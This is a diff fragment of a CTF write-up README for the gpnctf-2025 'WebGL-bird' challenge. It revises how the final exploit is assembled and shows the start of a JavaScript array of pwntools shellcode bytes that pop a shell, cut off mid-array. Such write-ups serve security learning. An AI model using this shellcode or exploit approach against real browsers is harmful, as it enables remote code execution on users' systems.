s41nt0l3xus/CTF-writeups/gpnctf-2025/WebGL-bird/README.md

 ![](./assets/mother_hacker.png)

-Putting it all together - and computing the previously omitted offsets - we end up with the complete exploit [script](./task/exploit.js).
-(Helper functions are omitted.)
+To put it all together we need just fill one gap - omitted exploit offsets (they can be easily found in debugger) and `shellcode` (we'll use the default one [generated](./task/shellcode.py) with `pwntools` for popping shell):
 ```JavaScript
 // Generated with shellcode.py - just pops a shell
 const shellcode_bytes = new Uint8Array([0x6a,0x68,0x48,0xb8,0x2f,0x62,0x69,0x6e,0x2f,0x2f,0x2f,0x73,0x50,0x48,0x89,0xe7,0x68,0x72,0x69,0x1,0x1,0x81,0x34,0x24,0x1,0x1,0x1,0x1,0x31,0xf6,0x56,0x6a,0x8,0x5e,0x48,;